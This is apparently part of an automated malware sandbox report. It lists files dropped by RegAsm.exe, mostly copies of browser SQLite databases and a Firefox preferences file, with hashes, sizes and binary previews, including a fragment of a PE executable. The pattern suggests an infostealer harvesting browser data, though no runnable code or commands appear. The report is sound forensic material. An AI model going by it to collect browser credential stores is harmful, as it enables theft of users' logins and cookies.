                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..f.................2..........~Q... ...`....@.. ....................................`.................................,Q..O....`..............xe..(&...........O............................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B................`Q......H........A..............................................................VeO..z..?Z..#...b..t.H.xK.......+...,...57....>1.G2.%j.......u.-.E.mR.U....-6W.4.bW...5.>B...].. ..s..f.'.(o...}..k.P..q>j...][T..............s.p}HT-o8.....^.....p.....K7?.n.tEK>^.8.p.....+.bW...{:S...j...Z......z.d2.i....65.u.|.vUy1....#6......P...}.$..K..\X....$..Z.D....X..q.K.^..I.>.L.j.v...-H.-.K...E.G...)r..C.,y-^6............~MJ).'....K...."p.5...9...A..0..sCU..=.......FYy...

                                                                                                                                                                                                                                C:\ProgramData\FIDGDAKF

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                Entropy (8bit):1.1371207751183456
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
                                                                                                                                                                                                                                MD5:643AC1E34BE0FDE5FA0CD279E476DF3A
                                                                                                                                                                                                                                SHA1:241B9EA323D640B82E8085803CBE3F61FEEA458F
                                                                                                                                                                                                                                SHA-256:C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
                                                                                                                                                                                                                                SHA-512:73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\GIIJEBAECGCBKECAAAEB

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\HCFBAFIDAECAKFHJDBAFIEBKKK

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\JDGIECGIEBKJJJJKEGHJ

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KKJEBAAECBGD\AKFCFB

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                Entropy (8bit):1.1221538113908904
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                                                                                                                                                                                                MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                                                                                                                                                                                                SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                                                                                                                                                                                                SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                                                                                                                                                                                                SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KKJEBAAECBGD\DBFHCG

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                Entropy (8bit):1.1371207751183456
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
                                                                                                                                                                                                                                MD5:643AC1E34BE0FDE5FA0CD279E476DF3A
                                                                                                                                                                                                                                SHA1:241B9EA323D640B82E8085803CBE3F61FEEA458F
                                                                                                                                                                                                                                SHA-256:C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
                                                                                                                                                                                                                                SHA-512:73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KKJEBAAECBGD\DHCFID

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KKJEBAAECBGD\DHCGID

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KKJEBAAECBGD\EBGIEG

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                Entropy (8bit):0.8467337400211222
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
                                                                                                                                                                                                                                MD5:7A03CC0EAD0AEFF210C3E60823AAA5EC
                                                                                                                                                                                                                                SHA1:8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
                                                                                                                                                                                                                                SHA-256:D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
                                                                                                                                                                                                                                SHA-512:8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KKJEBAAECBGD\EGCBAF

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KKJEBAAECBGD\GDHDAE

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KKJEBAAECBGD\GDHDAE-shm

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KKJEBAAECBGD\HJDGHI

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                Entropy (8bit):0.03862698848467049
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
                                                                                                                                                                                                                                MD5:507BA3B63F5856A191688A30D7E2A93A
                                                                                                                                                                                                                                SHA1:1B799649D965FF1562753A9EB9B04AC83E5D7C57
                                                                                                                                                                                                                                SHA-256:10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
                                                                                                                                                                                                                                SHA-512:7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KKJEBAAECBGD\HJDGHI-shm

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KKJEBAAECBGD\HJEHIJ

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):9526
                                                                                                                                                                                                                                Entropy (8bit):5.515924904533179
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:efniR4oYbBp6Sp0pUhUxaXd6Y4nysZM2WklbBNBw8DUSl:hejGpCUvY4ysn7tpwx0
                                                                                                                                                                                                                                MD5:4580799F1DC5720A7EC1766400E98740
                                                                                                                                                                                                                                SHA1:92FD30F47EC545245B934EA492B3C64D5E609AA9
                                                                                                                                                                                                                                SHA-256:57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
                                                                                                                                                                                                                                SHA-512:C0787F6584D1D26EBFD5AE59F32046CF1FF5AD1BEB1443F2FE93EB89EFA2F216CBC98E101BA3E38A2837ED9411A9DE1370E29ED96E83D8096547E53FEE964567
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "d3d72102-142d-47cc-a7b7-5b20541f2540");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696496527);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696496528);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                C:\ProgramData\KKJEBAAECBGD\KFIEHI

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):155648
                                                                                                                                                                                                                                Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\KKJEBAAECBGD\KJDGDB

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                                                Entropy (8bit):0.49323792361086954
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaY:cJhXC9lHmutpJyiRDeJ/aUKrDgnmO
                                                                                                                                                                                                                                MD5:8CFC90E97A4565F1D1C173122FB43468
                                                                                                                                                                                                                                SHA1:B9536A784FECB44601981C321E4074EDFCC51150
                                                                                                                                                                                                                                SHA-256:B2DE620450BA5FD74C9A41B194F0148D761B891A610F851DD76EC63DF4DB7D91
                                                                                                                                                                                                                                SHA-512:FF30A95D2CF44313D10E125A524675D055683DB7F8BB7F6632BAC6780C860337C8398F172EA27A0D06CF768BE375D628E7D3F8BA3864B925EC53376D37C376CE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                Download File
